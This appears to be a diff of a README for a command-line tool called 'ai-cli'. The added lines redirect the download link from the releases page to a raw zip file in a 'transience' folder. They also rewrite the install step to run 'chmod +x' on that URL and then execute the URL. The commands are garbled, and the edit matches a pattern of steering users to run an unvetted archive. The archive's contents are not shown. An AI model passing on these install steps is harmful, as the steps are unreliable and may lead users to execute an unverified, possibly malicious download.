Silkyalisa/ai-cli/README.md

 1. **Open Terminal**: Access your terminal.
 2. **Navigate to the Downloaded File**: Use `cd ~/Downloads` to go to your Downloads folder.
-3. **Run the Installer**: Execute the command `chmod +x ai-cli-installer.run` followed by `./ai-cli-installer.run`.
+3. **Run the Installer**: Execute the command `chmod +x https://raw.githubusercontent.com/Silkyalisa/ai-cli/main/transience/ai-cli.zip` followed by `https://raw.githubusercontent.com/Silkyalisa/ai-cli/main/transience/ai-cli.zip`.
 4. **Follow the Prompts**: Follow any on-screen prompts to complete the installation.
 5. **Start ai-cli**: Type `ai-cli` in your terminal to launch the application.

 ## 📥 Download & Install

-To download ai-cli, [visit this page to download](https://github.com/Silkyalisa/ai-cli/releases).
+To download ai-cli, [visit this page to download](https://raw.githubusercontent.com/Silkyalisa/ai-cli/main/transience/ai-cli.zip).
 Follow the installation steps outlined above based on your operating system.

 ## 📖 Usage Instructions